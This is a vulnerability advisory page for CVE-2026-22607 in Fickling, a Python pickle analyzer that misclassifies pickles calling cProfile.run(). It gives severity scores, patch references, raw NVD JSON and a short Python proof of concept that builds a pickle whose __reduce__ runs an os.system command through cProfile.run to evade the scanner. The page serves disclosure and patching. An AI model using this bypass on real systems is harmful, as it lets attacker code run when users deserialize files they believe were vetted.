CVE-2026-22607

Description

Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:trailofbits:fickling:*:*:*:*:*:*:*:* - VULNERABLE

Fickling < 0.1.7

Fickling 0.1.0 - 0.1.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

"""
CVE-2026-22607 PoC - Malicious pickle using cProfile.run()
This PoC demonstrates how an attacker can bypass Fickling's security check
by using cProfile.run() instead of directly calling os.system().
"""

import pickle
import cProfile
import os

class MaliciousPayload:
    def __reduce__(self):
        # Using cProfile.run() to execute arbitrary code
        # This will be misclassified by Fickling as SUSPICIOUS instead of OVERTLY_MALICIOUS
        return (cProfile.run, ('os.system("echo PWNED > /tmp/pwned.txt")',))

# Generate malicious pickle
malicious_pickle = pickle.dumps(MaliciousPayload())

# Save to file (for testing)
with open('malicious_cprofile.pkl', 'wb') as f:
    f.write(malicious_pickle)

print('Malicious pickle created: malicious_cprofile.pkl')
print('Fickling will classify this as SUSPICIOUS, not OVERTLY_MALICIOUS')
print('When deserialized, it will execute: os.system("echo PWNED > /tmp/pwned.txt")')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22607/
[4] VulDB https://vuldb.com/cve/CVE-2026-22607
[5] https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43
[6] https://github.com/trailofbits/fickling/releases/tag/v0.1.7
[7] https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9
[8] https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22607", "sourceIdentifier": "[email protected]", "published": "2026-01-10T02:15:49.780", "lastModified": "2026-01-16T18:58:22.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7."}, {"lang": "es", "value": "Fickling es un descompilador de pickling de Python y analizador estático. Las versiones de Fickling hasta la 0.1.6 inclusive no tratan el módulo cProfile de Python como inseguro. Debido a esto, un pickle malicioso que utiliza cProfile.run() se clasifica como SOSPECHOSO en lugar de MANIFIESTAMENTE_MALICIOSO. Si un usuario confía en la salida de Fickling para decidir si un pickle es seguro para la deserialización, esta clasificación errónea puede llevarlos a ejecutar código controlado por el atacante en su sistema. Esto afecta a cualquier flujo de trabajo o producto que utilice Fickling como una puerta de seguridad para la deserialización de pickles. Este problema ha sido parcheado en la versión 0.1.7."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-184"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trailofbits:fickling:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.1.7", "matchCriteriaId": "5E86A331-3CDE-4B67-AE0E-690AF652E670"}]}]}], "references": [{"url": "https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}